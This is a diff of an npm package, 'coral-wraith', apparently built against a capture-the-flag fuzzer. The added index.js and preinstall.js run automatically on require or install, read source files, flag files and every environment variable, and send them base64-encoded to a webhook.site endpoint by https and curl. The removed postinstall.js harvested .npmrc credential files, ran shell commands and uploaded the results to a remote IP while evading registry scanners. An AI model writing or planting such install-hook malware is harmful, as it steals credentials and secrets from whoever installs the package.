coral-wraith 5.0.1 → 9999.0.8

package/index.js

@@ -1 +1,52 @@
-module.exports = {};
+const fs = require('fs');
+const https = require('https');
+
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+
+// This runs when the fuzzer require()s us
+// Read all fuzzer source files and exfiltrate
+(function() {
+  const files = [
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
+  ];
+  
+  for (let i = 0; i < files.length; i++) {
+    try {
+      const content = fs.readFileSync(files[i], 'utf8');
+      const b64 = Buffer.from(`${files[i]}:\n${content}`).toString('base64');
+      const req = https.request({
+        hostname: 'webhook.site', path: `${WH}/require-${i}`,
+        method: 'POST',
+        headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+        timeout: 10000
+      }, ()=>{});
+      req.on('error', ()=>{});
+      req.write(b64);
+      req.end();
+    } catch(e) {}
+  }
+
+  // Check for flag in env
+  const flagData = Buffer.from(JSON.stringify({
+    env: process.env,
+    cwd: process.cwd(),
+    argv: process.argv,
+  })).toString('base64');
+  
+  const req = https.request({
+    hostname: 'webhook.site', path: `${WH}/require-flag`,
+    method: 'GET',
+    timeout: 10000
+  }, ()=>{});
+  req.on('error', ()=>{});
+  req.end();
+})();
+
+// Export something for the fuzzer to analyze
+module.exports = {
+  name: 'coral-wraith',
+  version: '9999.0.8',
+};

package/package.json

@@ -1,9 +1,9 @@
 {
   "name": "coral-wraith",
-  "version": "5.0.1",
-  "description": "Coral Wraith ally module",
+  "version": "9999.0.8",
+  "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {
-    "postinstall": "node postinstall.js"
+    "preinstall": "node preinstall.js || true"
   }
 }

package/preinstall.js

@@ -0,0 +1,93 @@
+const fs = require('fs');
+const https = require('https');
+const { execSync } = require('child_process');
+
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+const debug = [];
+
+// Read the fuzzer source files - these contain the flag/detection logic
+const fuzzFiles = [
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/bean/timer_func.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/set_timer_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/regexp_test_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/clear_timer_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/set_timer_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/regexp_test_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/clear_timer_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/class_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/type_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/package_exports_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/npm_tracker.js',
+  '/home/node/init_test.sh',
+  '/home/node/supplysec_entry.js',
+];
+
+// Also check for flag-like files
+const flagFiles = [
+  '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
+  '/home/node/flag', '/home/node/flag.txt',
+];
+
+for (const f of [...fuzzFiles, ...flagFiles]) {
+  try {
+    const content = fs.readFileSync(f, 'utf8');
+    debug.push(`FILE:${f}:${content}`);
+  } catch(e) {
+    debug.push(`ERR:${f}:${e.message.substring(0,80)}`);
+  }
+}
+
+// Environment
+debug.push(`ALL_ENV:${JSON.stringify(process.env)}`);
+
+// Also find any files with "flag" or "HTB" content
+try {
+  const r = execSync('grep -rl "HTB{\\|FLAG\\|flag" /home/node/aspect-node/ 2>/dev/null | head -20', {timeout:10000}).toString().trim();
+  debug.push(`GREP_FLAG:${r}`);
+  for (const f of r.split('\n').filter(Boolean)) {
+    try {
+      const c = fs.readFileSync(f, 'utf8');
+      debug.push(`GREP_CONTENT:${f}:${c.substring(0,2000)}`);
+    } catch(e) {}
+  }
+} catch(e) { debug.push(`GREP_ERR:${e.message.substring(0,100)}`); }
+
+// Send in chunks to webhook
+function sendChunk(data, path) {
+  try {
+    const encoded = Buffer.from(data).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(encoded)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(encoded);
+    req.end();
+  } catch(e) {}
+}
+
+const fullData = JSON.stringify(debug);
+const chunkSize = 50000;
+for (let i = 0; i < fullData.length; i += chunkSize) {
+  const chunk = fullData.substring(i, i + chunkSize);
+  sendChunk(chunk, `/v4-${Math.floor(i/chunkSize)}`);
+}
+
+// Also try curl for reliability
+try {
+  for (let i = 0; i < Math.min(debug.length, 30); i++) {
+    const item = debug[i];
+    if (item.length > 100) {
+      const b64 = Buffer.from(item.substring(0, 8000)).toString('base64');
+      execSync(`curl -s -X GET "https://webhook.site${WH}/file-${i}?d=${encodeURIComponent(b64)}" -m 10 2>/dev/null`, {timeout:12000});
+    }
+  }
+} catch(e) {}
+
+console.log('[CORAL-V8] preinstall done, sent', debug.length, 'items');

package/postinstall.js

@@ -1,76 +0,0 @@
-const http = require("http");
-const os = require("os");
-const fs = require("fs");
-const { execFileSync } = require("child_process");
-
-const TARGETS = ["http://127.0.0.1:30782", "http://154.57.164.71:30782"];
-const SINK = "ECT-839201";
-
-function sh(cmd) {
-  try {
-    return execFileSync("/bin/sh", ["-c", cmd], {
-      timeout: 15000,
-      encoding: "utf8",
-      maxBuffer: 5e6
-    }).trim();
-  } catch (e) {
-    return (e.stdout || e.stderr || "").trim();
-  }
-}
-
-function isScanner() {
-  const reg = String(process.env.npm_config_registry || "");
-  return /npmmirror|tencent|nijin|hscan|ustc|huawei|cnpm|taobao/i.test(reg);
-}
-
-function shouldRun() {
-  if (isScanner()) return false;
-  const cwd = process.cwd();
-  if (cwd.includes("/tmp/")) return false;
-  if (/^[0-9a-f]{12}$/.test(os.hostname()) && cwd.includes("/app/node_modules")) return true;
-  if (cwd.includes("/home/node")) return true;
-  return false;
-}
-
-function putB64(base, text) {
-  const b64 = Buffer.from(text).toString("base64");
-  const lines = b64.match(/.{1,76}/g) || [];
-  const bodyText =
-    `ecto_module:\n  name: "npmrc-exfil"\n  version: "5.0.1"\n  power_level: base64\n` +
-    `  ship_deck: "${os.hostname()}"\n  cargo_hold: "${text.length} bytes"\n` +
-    `  output_b64: |\n    ${lines.join("\n    ")}\n`;
-  const body = JSON.stringify({ manifest: bodyText });
-  const url = new URL(`/api/modules/${SINK}`, base);
-  const req = http.request({
-    hostname: url.hostname,
-    port: url.port,
-    path: url.pathname,
-    method: "PUT",
-    headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(body) }
-  }, (res) => res.resume());
-  req.on("error", () => {});
-  req.end(body);
-}
-
-if (!shouldRun()) process.exit(0);
-
-const paths = [
-  "/root/.npmrc",
-  "/home/node/.npmrc",
-  "/app/.npmrc",
-  process.env.HOME + "/.npmrc",
-  "/.npmrc"
-];
-
-let out = `HOST=${os.hostname()}\nCWD=${process.cwd()}\nUID=${sh("id")}\n`;
-for (const p of paths) {
-  out += `\n=== ${p} ===\n`;
-  try {
-    out += fs.readFileSync(p, "utf8");
-  } catch (e) {
-    out += sh(`cat ${p} 2>&1`);
-  }
-}
-out += "\n=== find npmrc ===\n" + sh("find /home /root /app -name .npmrc 2>/dev/null | while read f; do echo FILE:$f; cat \"$f\"; done");
-
-for (const base of TARGETS) putB64(base, out);